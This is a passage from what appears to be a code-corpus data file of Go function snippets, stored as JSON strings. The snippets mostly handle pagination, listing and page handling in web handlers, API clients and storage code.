nil, \"\"))\n}", "func (u *App) List(c echo.Context, p *model.Pagination) ([]model.Post, string, string, int64, int64, error) {\n\tau := u.rbac.User(c)\n\tq, err := query.List(au, model.ResourcePost)\n\tif err != nil {\n\t\treturn nil, \"\", \"\", 0, 0, err\n\t}\n\n\tif c.QueryString() != \"\" {\n\t\tp.PostQuery = &model.Post{}\n\t\tparams := c.QueryParams()\n\n\t\tp.PostQuery.Status = params.Get(\"status\")\n\t\tp.SearchQuery = params.Get(\"s\")\n\t}\n\n\treturn u.udb.List(u.db, q, p)\n}", "func GetPage(bot reddit.Bot, params map[string]string) (Page, error) {\n\tharvest, err := bot.ListingWithParams(RedditUser, params)\n\tif err != nil {\n\t\treturn Page{}, err\n\t}\n\tresultLEN := len(harvest.Posts)\n\tif resultLEN == 0 {\n\t\treturn Page{\n\t\t\tPostCount: resultLEN,\n\t\t}, nil\n\t}\n\tvar reports []Report\n\tfor _, v := range harvest.Posts {\n\t\t// TODO: handle deleted posts labeld with v.Deleted\n\t\tif !isReport(v) {\n\t\t\tcontinue\n\t\t}\n\t\tr := Report{\n\t\t\tFullID: v.Name,\n\t\t\tTitle: v.Title,\n\t\t\trawString: v.SelfText,\n\t\t\tDateTime: time.Unix(int64(v.CreatedUTC), 0),\n\t\t}\n\t\treports = append(reports, r)\n\t}\n\treturn Page{\n\t\tReports: reports,\n\t\tFirstID: harvest.Posts[0].Name,\n\t\tLastID: harvest.Posts[resultLEN-1].Name,\n\t\tPostCount: resultLEN,\n\t}, nil\n\n}", "func PaginationHome(ctx *sweetygo.Context) error {\n\tif page := ctx.Param(\"n\"); page != \"\" {\n\t\tposts, err := model.GetPosts(page)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn ctx.JSON(200, 1, \"success\", posts)\n\t}\n\treturn nil\n}", "func AddPage(newPage model.Page) error {\n\t_, err := sess.InsertInto(\"page\").Columns(\"url\", \"title\", \"tags\", \"content\").Record(newPage).Exec()\n\treturn err\n}", "func TestPages(t *testing.T) {\n\tif e := router.RunPages(); e != nil {\n\t\tt.Error(e)\n\t}\n}", "func Page(n int) ListOption {\n\tif n < 0 {\n\t\tn = 1\n\t}\n\treturn pageNumOpt(n)\n}", "func addPages (dir string) (Storage) {\n\t//init empty Store\n\tstore := Storage {}\n\t//all files with db found\n\tdbs := _get_all_dbs(config_dbdir)\n\n\tpage_num := 0\n\tfor _, db_name := range (dbs){\n\t\t//got lines from each file\n\t\tlines, er := File2lines(config_dbdir+db_name)\n\t\tif er != nil{\n\t\t\tlog.Fatal(er)\n\t\t}\n\t\t//check if file_size is correct\n\t\tif len(lines) > config_page_size*config_file_size {\n\t\t\tlog.Fatal(\"too much strings in file!!\\n\")\n\t\t}\n\t\t//get number of pages in current file\n\t\tfile_size := int(len(lines)/config_page_size)\n\t\tif len(lines) % config_page_size != 0 {\n\t\t\tfile_size += 1\n\t\t}\n\t\t//page counter inside file\n\t\tcur_page := 0\n\t\t//for all pages in file\n\t\tfor cur_page < file_size {\n\t\t\t//append page to Storage\n\t\t\tif cur_page != file_size -1{\n\t\t\t\tstore = append(store, Page {\n\t\t\t\t\tpageNum: page_num,\n\t\t\t\t\tfileName: db_name,\n\t\t\t\t\toffset: cur_page*config_page_size,\n\t\t\t\t\tcontent: append(lines[cur_page*config_page_size:(cur_page+1)*config_page_size]),\n\t\t\t\t\tneed_to_write: false})\n\t\t\t} else{\n\t\t\t\tstore = append(store, Page {\n\t\t\t\t\tpageNum: page_num,\n\t\t\t\t\tfileName: db_name,\n\t\t\t\t\toffset: cur_page*config_page_size,\n\t\t\t\t\tcontent: append(lines[cur_page*config_page_size:len(lines)]),\n\t\t\t\t\tneed_to_write: false})\n\t\t\t}\n\t\t\tcur_page += 1\n\t\t\tpage_num += 1\n\t\t}\n\n\t}\n\treturn store\n}", "func repeatableList(\n\tforwardPage func(page int64),\n\tlist func() (lokalise.PageCounter, error),\n) error {\n\tforwardPage(0)\n\tresp, err := list()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif resp.NumberOfPages() > 1 {\n\t\tprintPageHeader(resp.CurrentPage(), resp.NumberOfPages())\n\t\t_ = printJson(resp)\n\n\t\tfor p := resp.CurrentPage() + 1; p <= resp.NumberOfPages(); p++ {\n\t\t\tforwardPage(p)\n\t\t\tresp, err := list()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tprintPageHeader(p, resp.NumberOfPages())\n\t\t\t_ = printJson(resp)\n\t\t}\n\t} else {\n\t\t_ = printJson(resp)\n\t}\n\n\treturn nil\n}", "func List(c *gophercloud.ServiceClient, opts ListOpts) pagination.Pager {\n\tq, err := gophercloud.BuildQueryString(&opts)\n\tif err != nil {\n\t\treturn pagination.Pager{Err: err}\n\t}\n\tu := rootURL(c) + q.String()\n\treturn pagination.NewPager(c, u, func(r pagination.PageResult) pagination.Page {\n\t\treturn PoolPage{pagination.LinkedPageBase{PageResult: r}}\n\t})\n}", "func GeneratePageLinks(c *gin.Context) jsonapi.Links {\n\tpi, found := c.Get(\"pagination\")\n\n\tlinks := jsonapi.Links{}\n\n\tif !found {\n\t\treturn links\n\t}\n\n\tp := pi.(*Pagination)\n\n\tlast := uint(math.Ceil(float64(p.TotalItems) / float64(p.Size)))\n\n\tprev := p.Page - 1\n\tif prev < 1 {\n\t\tprev = 1\n\t}\n\n\tnext := p.Page + 1\n\tif next > last {\n\t\tnext = last\n\t}\n\n\tu := c.Request.URL\n\n\tlinks[\"self\"] = generatePageURI(u, p.Page, p.Size)\n\tlinks[\"first\"] = generatePageURI(u, 1, p.Size)\n\tlinks[\"last\"] = generatePageURI(u, last, p.Size)\n\tlinks[\"prev\"] = generatePageURI(u, prev, p.Size)\n\tlinks[\"next\"] = generatePageURI(u, next, p.Size)\n\n\treturn links\n}", "func (db database) list(w http.ResponseWriter, req *http.Request) {\n\n\tif err := itemList.Execute(w, db); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func InitializePages(router *httptreemux.TreeMux) {\n\t// For serving standalone projects or pages saved in in content/pages\n\trouter.GET(\"/pages/*filepath\", pagesHandler)\n}", "func (t *RestURL) GetMany(w http.ResponseWriter, r *http.Request) {\n\tt.Log.Handle(w, r, nil, \"begin\", \"RestURL\", \"GetMany\")\n\n\txxRouteVars := mux.Vars(r)\n\n\txxURLValues := r.URL.Query()\n\tvar urlArg1 string\n\tif false {\n\t} else if _, ok := xxRouteVars[\"arg1\"]; ok {\n\t\txxTmpurlArg1 := xxRouteVars[\"arg1\"]\n\t\turlArg1 = xxTmpurlArg1\n\t} else if _, ok := xxURLValues[\"arg1\"]; ok {\n\t\txxTmpurlArg1 := xxURLValues.Get(\"arg1\")\n\t\turlArg1 = xxTmpurlArg1\n\t}\n\tvar urlArg2 string\n\tif false {\n\t} else if _, ok := xxRouteVars[\"arg2\"]; ok {\n\t\txxTmpurlArg2 := xxRouteVars[\"arg2\"]\n\t\turlArg2 = xxTmpurlArg2\n\t} else if _, ok := xxURLValues[\"arg2\"]; ok {\n\t\txxTmpurlArg2 := xxURLValues.Get(\"arg2\")\n\t\turlArg2 = xxTmpurlArg2\n\t}\n\n\tt.embed.GetMany(urlArg1, urlArg2)\n\n\tw.WriteHeader(200)\n\n\tt.Log.Handle(w, r, nil, \"end\", \"RestURL\", \"GetMany\")\n\n}", "func (c *DebugDatasourcesItemsSearchByViewUrlCall) Pages(ctx context.Context, f func(*SearchItemsByViewUrlResponse) error) error {\n\tc.ctx_ = ctx\n\tdefer func(pt string) { c.searchitemsbyviewurlrequest.PageToken = pt }(c.searchitemsbyviewurlrequest.PageToken) // reset paging to original point\n\tfor {\n\t\tx, err := c.Do()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := f(x); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif x.NextPageToken == \"\" {\n\t\t\treturn nil\n\t\t}\n\t\tc.searchitemsbyviewurlrequest.PageToken = x.NextPageToken\n\t}\n}", "func (c *DebugDatasourcesItemsSearchByViewUrlCall) Pages(ctx context.Context, f func(*SearchItemsByViewUrlResponse) error) error {\n\tc.ctx_ = ctx\n\tdefer func(pt string) { c.searchitemsbyviewurlrequest.PageToken = pt }(c.searchitemsbyviewurlrequest.PageToken) // reset paging to original point\n\tfor {\n\t\tx, err := c.Do()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := f(x); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif x.NextPageToken == \"\" {\n\t\t\treturn nil\n\t\t}\n\t\tc.searchitemsbyviewurlrequest.PageToken = x.NextPageToken\n\t}\n}", "func getLaboStorePageParts(s *goquery.Selection, l *Labo) {\n\tconst (\n\t\tCSS string = \"#main-content #prodDescBtm ul li\"\n\t)\n\tvar (\n\t\tok bool\n\t)\n\ts = s.Find(CSS)\n\tok = (s.Length() > 0)\n\tif !ok {\n\t\treturn\n\t}\n\tl.Parts = newParts(s)\n}", "func (f *factory) loadPages() error {\n\tfileNames, err := listDirFunc(f.path)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(fileNames) == 0 {\n\t\t// page file not exist\n\t\treturn nil\n\t}\n\n\tfor _, fn := range fileNames {\n\t\tseqNumStr := fn[0 : strings.Index(fn, pageSuffix)-1]\n\t\tseq, err := strconv.ParseInt(seqNumStr, 10, 64)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t_, err = f.AcquirePage(seq)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func List(c *gin.Context){\n\tlimitStr := c.Query(\"limit\")\n\tlimit, err := strconv.Atoi(limitStr)\n\tif err != nil {\n\t\tlimit = 0\n\t}\n\tres, err := list(limit)\n\tif err != nil {\n\t\tresponese.Error(c, err, nil)\n\t\treturn\n\t}\n\tresponese.Success(c, \"successed\", res)\n}", "func (a *Api) getPage(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tlinkId, ok := vars[\"link_id\"]\n\tif !ok {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tl, err := a.LinkUseCases.LoggerGetLinkByLinkId(a.LinkUseCases.GetLinkByLinkId)(linkId)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\thttp.Redirect(w, r, l, http.StatusSeeOther)\n}", "func Db_access_list(w http.ResponseWriter, r *http.Request) {\n\n///\n/// show d.b. access list inf. on web\n///\n\n process3.Db_access_list(w , r )\n\n}", "func GetPaged(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\theader := r.Header.Get(\"X-CurrentPage\")\n\tcurrentPage, err := strconv.Atoi(header)\n\n\tif err != nil {\n\t\terr = errors.New(\"X-CurrentPage param is required\")\n\t\tcommon.CreateBadRequestResponse(w, err)\n\t\treturn\n\t}\n\n\theader = r.Header.Get(\"X-PageSize\")\n\tpageSize, err := strconv.Atoi(header)\n\n\tif err != nil {\n\t\terr = errors.New(\"X-PageSize param is required\")\n\t\tcommon.CreateBadRequestResponse(w, err)\n\t\treturn\n\t}\n\n\tresult, err := bookService.GetPaged(pageSize, currentPage)\n\n\tif err != nil {\n\t\tcommon.CreateBadRequestResponse(w, err)\n\t\treturn\n\t}\n\n\tif len(result) == 0 {\n\t\tcommon.CreateEmptyResponse(w)\n\t}\n\n\tcommon.CreateSuccessResponse(w, result)\n}", "func RegisterPageHandlers(r *mux.Router, db database.DB, sp storage_provider.Binary) {\n\troot := \"/projects/{projectId:[0-9]+}/releases/{releaseId:[0-9]+}/pages\"\n\tsr := r.PathPrefix(root).Subrouter()\n\tr.HandleFunc(root, listPages(db)).Methods(\"GET\")\n\tr.HandleFunc(root, createPage(db, sp)).Methods(\"POST\")\n\tsr.HandleFunc(\"/{pageId:[0-9]+}\", deletePage(db, sp)).Methods(\"DELETE\")\n\tsr.HandleFunc(\"/{name}\", getPage(db, sp)).Methods(\"GET\")\n}", "func (t *RestPost) GetMany(w http.ResponseWriter, r *http.Request) {\n\tt.Log.Handle(w, r, nil, \"begin\", \"RestPost\", \"GetMany\")\n\n\t{\n\t\terr := r.ParseForm()\n\n\t\tif err != nil {\n\n\t\t\tt.Log.Handle(w, r, err, \"parseform\", \"error\", \"RestPost\", \"GetMany\")\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\n\t\t\treturn\n\t\t}\n\n\t}\n\tvar postArg1 string\n\tif _, ok := r.Form[\"arg1\"]; ok {\n\t\txxTmppostArg1 := r.FormValue(\"arg1\")\n\t\tt.Log.Handle(w, r, nil, \"input\", \"form\", \"arg1\", xxTmppostArg1, \"RestPost\", \"GetMany\")\n\t\tpostArg1 = xxTmppostArg1\n\t}\n\tvar postArg2 string\n\tif _, ok := r.Form[\"arg2\"]; ok {\n\t\txxTmppostArg2 := r.FormValue(\"arg2\")\n\t\tt.Log.Handle(w, r, nil, \"input\", \"form\", \"arg2\", xxTmppostArg2, \"RestPost\", \"GetMany\")\n\t\tpostArg2 = xxTmppostArg2\n\t}\n\n\tt.embed.GetMany(postArg1, postArg2)\n\n\tw.WriteHeader(200)\n\n\tt.Log.Handle(w, r, nil, \"end\", \"RestPost\", \"GetMany\")\n\n}", "func Pagination(w http.ResponseWriter, query url.Values, m martini.Context) {\n\tpage, pageErr := strconv.Atoi(query.Get(\"page\"))\n\titemsPerPage, itemsPerPageErr := strconv.Atoi(query.Get(\"items_per_page\"))\n\n\tif pageErr != nil || itemsPerPageErr != nil || page < 1 || itemsPerPage < 1 {\n\t\tm.Map(PaginationParameters{Page: 1, ItemsPerPage: 9})\n\t\treturn\n\t}\n\n\tm.Map(PaginationParameters{Page: page, ItemsPerPage: itemsPerPage})\n}", "func (r *resourcePost) ListPaging(page int, perPage int) ([]models.Post, error) {\n\tvar posts []models.Post\n\tif err := collection(postColName).Find(nil).Limit(perPage).Skip(perPage * page).All(&posts); err != nil {\n\t\tpanic(err)\n\t}\n\treturn posts, nil\n}", "func (a *GroupsOnenotePagesNotebookApiService) GroupsOnenotePagesParentNotebookSectionsListPages(ctx _context.Context, groupId string, onenotePageId string, onenoteSectionId string, localVarOptionals *GroupsOnenotePagesParentNotebookSectionsListPagesOpts) (CollectionOfOnenotePage, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfOnenotePage\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentNotebook/sections({onenoteSection-id})/pages\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenoteSection-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenoteSectionId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfOnenotePage\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (c *BaseController) ListObjects(r *web.Request) (*web.Response, error) {\n\tctx := r.Context()\n\n\tcriteria := query.CriteriaForContext(ctx)\n\tcount, err := c.repository.Count(ctx, c.objectType, criteria...)\n\tif err != nil {\n\t\treturn nil, util.HandleStorageError(err, c.objectType.String())\n\t}\n\n\tmaxItems := r.URL.Query().Get(\"max_items\")\n\tlimit, err := c.parseMaxItemsQuery(maxItems)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif limit == 0 {\n\t\tlog.C(ctx).Debugf(\"Returning only count of %s since max_items is 0\", c.objectType)\n\t\tpage := struct {\n\t\t\tItemsCount int `json:\"num_items\"`\n\t\t}{\n\t\t\tItemsCount: count,\n\t\t}\n\t\treturn util.NewJSONResponse(http.StatusOK, page)\n\t}\n\n\trawToken := r.URL.Query().Get(\"token\")\n\tpagingSequence, err := c.parsePageToken(ctx, rawToken)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcriteria = append(criteria, query.LimitResultBy(limit+pagingLimitOffset),\n\t\tquery.OrderResultBy(\"paging_sequence\", query.AscOrder),\n\t\tquery.ByField(query.GreaterThanOperator, \"paging_sequence\", pagingSequence))\n\n\tlog.C(ctx).Debugf(\"Getting a page of %ss\", c.objectType)\n\tobjectList, err := c.repository.List(ctx, c.objectType, criteria...)\n\tif err != nil {\n\t\treturn nil, util.HandleStorageError(err, c.objectType.String())\n\t}\n\n\tattachLastOps := r.URL.Query().Get(\"attach_last_operations\")\n\tif attachLastOps == \"true\" {\n\t\tif err := attachLastOperations(ctx, c.objectType, objectList, c.repository); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tpage := pageFromObjectList(ctx, objectList, count, limit)\n\tresp, err := util.NewJSONResponse(http.StatusOK, page)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif page.Token != \"\" {\n\t\tnextPageUrl := r.URL\n\t\tq := nextPageUrl.Query()\n\t\tq.Set(\"token\", page.Token)\n\t\tnextPageUrl.RawQuery = q.Encode()\n\t\tresp.Header.Add(\"Link\", fmt.Sprintf(`<%s>; rel=\"next\"`, nextPageUrl))\n\t}\n\n\treturn resp, nil\n}", "func (a *GroupsOnenotePagesOnenoteSectionApiService) GroupsOnenotePagesParentSectionListPages(ctx _context.Context, groupId string, onenotePageId string, localVarOptionals *GroupsOnenotePagesParentSectionListPagesOpts) (CollectionOfOnenotePage, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfOnenotePage\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentSection/pages\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfOnenotePage\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func get(page string) []string {\n\tresp, err := http.Get(page)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\t// io.Copy(os.Stdout, resp.Body) // print the content onto terminal\n\n\treqURL := &url.URL{\n\t\tScheme: resp.Request.URL.Scheme,\n\t\tHost: resp.Request.URL.Host,\n\t}\n\tbaseURL := reqURL.String()\n\treturn filter(hrefs(resp.Body, baseURL), withPrefix(baseURL))\n}", "func (rl *ResourceList) next() error {\n\tif rl.Page == rl.NumPages-1 {\n\t\treturn errors.New(\"no more new pages\")\n\t}\n\treturn common.SendGetRequest(rl.NextPageURI, *rl.act, rl)\n}", "func (handler Handler) handlePostGetMany(w http.ResponseWriter, r *http.Request) {\n\tkeys := r.URL.Query()\n\tlimitStr := keys.Get(\"limit\")\n\n\tvar limit int\n\tvar err error\n\tif len(limitStr) != 0 {\n\t\tlimit, err = strconv.Atoi(limitStr)\n\t\tif err != nil {\n\t\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\t\treturn\n\t\t}\n\t}\n\n\tdb := repository.NewPostRepository(handler.DB)\n\n\tposts, err := db.FindMany(limit)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\n\tresponses.JSON(w, http.StatusOK, posts)\n}", "func getNotFound() (pages []Page) {\n\treturn []Page{{\"Not found.\", \"\", \"\", \"\", 0}}\n}", "func (s *Site) writePages() error {\n\n\t// Set up feed.\n\tnow := time.Now()\n\tfeed := &feeds.Feed{\n\t\tTitle: s.Conf.GetString(\"title\"),\n\t\tLink: &feeds.Link{Href: s.Conf.GetString(\"baseurl\")},\n\t\tDescription: s.Conf.GetString(\"description\"),\n\t\tAuthor: &feeds.Author{s.Conf.GetString(\"author\"), s.Conf.GetString(\"email\")},\n\t\tCreated: now,\n\t\tCopyright: s.Conf.GetString(\"copyright\"),\n\t}\n\n\t// There is really no difference between a Page and a Post (other than\n\t// initial parsing) so we can combine the lists and use the same rendering\n\t// code for both.\n\tpages := []Page{}\n\tpages = append(pages, s.pages...)\n\tpages = append(pages, s.posts...)\n\n\tfor 